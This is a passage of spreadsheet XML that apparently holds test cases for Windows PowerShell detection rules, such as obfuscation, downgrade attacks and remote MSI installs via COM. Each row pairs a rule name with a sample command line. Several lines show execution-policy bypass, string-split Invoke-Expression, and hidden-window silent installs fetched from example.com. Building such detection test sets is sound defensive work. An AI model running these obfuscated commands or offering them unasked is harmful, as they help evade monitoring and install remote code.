    <row r="289" ht="15.75" customHeight="1" s="42">
      <c r="A289" s="43" t="n"/>
      <c r="B289" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C289" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D289" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E289" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H289" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I289" s="43" t="n"/>
      <c r="J289" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K289" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="290" ht="15.75" customHeight="1" s="42">
      <c r="A290" s="43" t="n"/>
      <c r="B290" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C290" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D290" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E290" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCUTIonPolICy Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F290" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G290" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H290" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I290" s="43" t="n"/>
      <c r="J290" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K290" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="291" ht="15.75" customHeight="1" s="42">
      <c r="A291" s="43" t="n"/>
      <c r="B291" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C291" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D291" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E291" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H291" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I291" s="43" t="n"/>
      <c r="J291" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K291" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="292" ht="15.75" customHeight="1" s="42">
      <c r="A292" s="43" t="n"/>
      <c r="B292" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C292" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D292" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E292" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H292" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I292" s="36" t="n"/>
      <c r="J292" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K292" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="293" ht="15.75" customHeight="1" s="42">
      <c r="A293" s="43" t="n"/>
      <c r="B293" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C293" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D293" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E293" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H293" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I293" s="36" t="n"/>
      <c r="J293" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K293" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="294" ht="15.75" customHeight="1" s="42">
      <c r="A294" s="43" t="n"/>
      <c r="B294" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C294" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D294" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E294" s="36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294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H294" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I294" s="43" t="n"/>
      <c r="J294" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K294" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="295" ht="15.75" customHeight="1" s="42">
      <c r="A295" s="43" t="n"/>
      <c r="B295" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C295" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D295" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E295" s="36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295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H295" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I295" s="36" t="n"/>
      <c r="J295" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K295" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="296" ht="15.75" customHeight="1" s="42">
      <c r="A296" s="43" t="n"/>
      <c r="B296" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C296" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D296" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E296" s="36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296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H296" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I296" s="43" t="n"/>
      <c r="J296" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K296" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="297" ht="15.75" customHeight="1" s="42">
      <c r="A297" s="43" t="n"/>
      <c r="B297" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C297" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D297" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E297" s="36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297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H297" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I297" s="36" t="n"/>
      <c r="J297" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K297" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="15.75" customHeight="1" s="42">
      <c r="A298" s="43" t="n"/>
      <c r="B298" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C298" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D298" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E298" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -COMmanD "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H298" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I298" s="43" t="n"/>
      <c r="J298" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K298" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="15.75" customHeight="1" s="42">
      <c r="A299" s="43" t="n"/>
      <c r="B299" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C299" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D299" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E299" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H299" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I299" s="43" t="n"/>
      <c r="J299" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K299" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="15.75" customHeight="1" s="42">
      <c r="A300" s="43" t="n"/>
      <c r="B300" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C300" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D300" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E300" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H300" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I300" s="43" t="n"/>
      <c r="J300" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K300" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="15.75" customHeight="1" s="42">
      <c r="A301" s="43" t="n"/>
      <c r="B301" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C301" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D301" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E301" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -wiNDowStyLe Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H301" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I301" s="43" t="n"/>
      <c r="J301" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K301" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="15.75" customHeight="1" s="42">
      <c r="A302" s="43" t="n"/>
      <c r="B302" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C302" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D302" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E302" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden /"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H302" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I302" s="43" t="n"/>
      <c r="J302" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K302" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="15.75" customHeight="1" s="42">
      <c r="A303" s="43" t="n"/>
      <c r="B303" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C303" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D303" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E303" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WiNDOwSTYlE Hidden -"Command" "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H303" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I303" s="43" t="n"/>
      <c r="J303" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K303" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="15.75" customHeight="1" s="42">
      <c r="A304" s="43" t="n"/>
      <c r="B304" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C304" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D304" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E304" s="36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304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H304" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I304" s="43" t="n"/>
      <c r="J304" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K304" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="15.75" customHeight="1" s="42">
      <c r="A305" s="43" t="n"/>
      <c r="B305" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C305" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D305" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E305" s="36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305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H305" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I305" s="43" t="n"/>
      <c r="J305" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K305" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="15.75" customHeight="1" s="42">
      <c r="A306" s="43" t="n"/>
      <c r="B306" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C306" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D306" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E306" s="36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306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H306" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I306" s="43" t="n"/>
      <c r="J306" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K306" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="307" ht="15.75" customHeight="1" s="42">
      <c r="A307" s="43" t="n"/>
      <c r="B307" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C307" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D307" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E307" s="36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307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H307" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I307" s="43" t="n"/>
      <c r="J307" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K307" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="15.75" customHeight="1" s="42">
      <c r="A308" s="43" t="n"/>
      <c r="B308" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C308" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D308" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E308" s="36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308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H308" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I308" s="36" t="n"/>
      <c r="J308" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K308" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="15.75" customHeight="1" s="42">
      <c r="A309" s="43" t="n"/>
      <c r="B309" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C309" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D309" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E309" s="36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09" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H309" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I309" s="43" t="n"/>
      <c r="J309" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K309" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="310" ht="15.75" customHeight="1" s="42">
      <c r="A310" s="43" t="n"/>
      <c r="B310" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C310" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D310" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E310" s="36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310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H310" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I310" s="36" t="n"/>
      <c r="J310" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K310" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="311" ht="15.75" customHeight="1" s="42">
      <c r="A311" s="43" t="n"/>
      <c r="B311" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C311" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D311" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E311" s="36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311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H311" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I311" s="43" t="n"/>
      <c r="J311" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K311" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="312" ht="15.75" customHeight="1" s="42">
      <c r="A312" s="43" t="n"/>
      <c r="B312" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C312" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D312" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E312" s="36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12" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G312" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H312" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I312" s="43" t="n"/>
      <c r="J312" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K312" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="313" ht="15.75" customHeight="1" s="42">
      <c r="A313" s="43" t="n"/>
      <c r="B313" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C313" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D313" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E313" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F313" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G313" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H313" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I313" s="43" t="n"/>
      <c r="J313" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K313" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="314" ht="15.75" customHeight="1" s="42">
      <c r="A314" s="43" t="n"/>
      <c r="B314" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C314" s="36" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D314" s="36" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E314" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H314" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I314" s="43" t="n"/>
      <c r="J314" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K314" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="315" ht="15.75" customHeight="1" s="42">
      <c r="A315" s="43" t="n"/>
      <c r="B315" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C315" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D315" s="36" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E315" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -v 2.0 -"Command" "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H315" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I315" s="43" t="n"/>
      <c r="J315" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K315" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="316" ht="15.75" customHeight="1" s="42">
      <c r="A316" s="43" t="n"/>
      <c r="B316" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C316" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D316" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E316" s="36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316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H316" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I316" s="36" t="n"/>
      <c r="J316" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K316" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="317" ht="15.75" customHeight="1" s="42">
      <c r="A317" s="43" t="n"/>
      <c r="B317" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C317" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D317" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E317" s="36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317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H317" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I317" s="36" t="n"/>
      <c r="J317" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K317" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="318" ht="15.75" customHeight="1" s="42">
      <c r="A318" s="43" t="n"/>
      <c r="B318" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C318" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D318" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E318" s="36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F318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H318" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I318" s="43" t="n"/>
      <c r="J318" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K318" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="319" ht="15.75" customHeight="1" s="42">
      <c r="A319" s="43" t="n"/>
      <c r="B319" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C319" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D319" s="36" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E319" s="36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F319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H319" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I319" s="43" t="n"/>
      <c r="J319" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K319" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="320" ht="15.75" customHeight="1" s="42">
      <c r="A320" s="43" t="n"/>
      <c r="B320" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
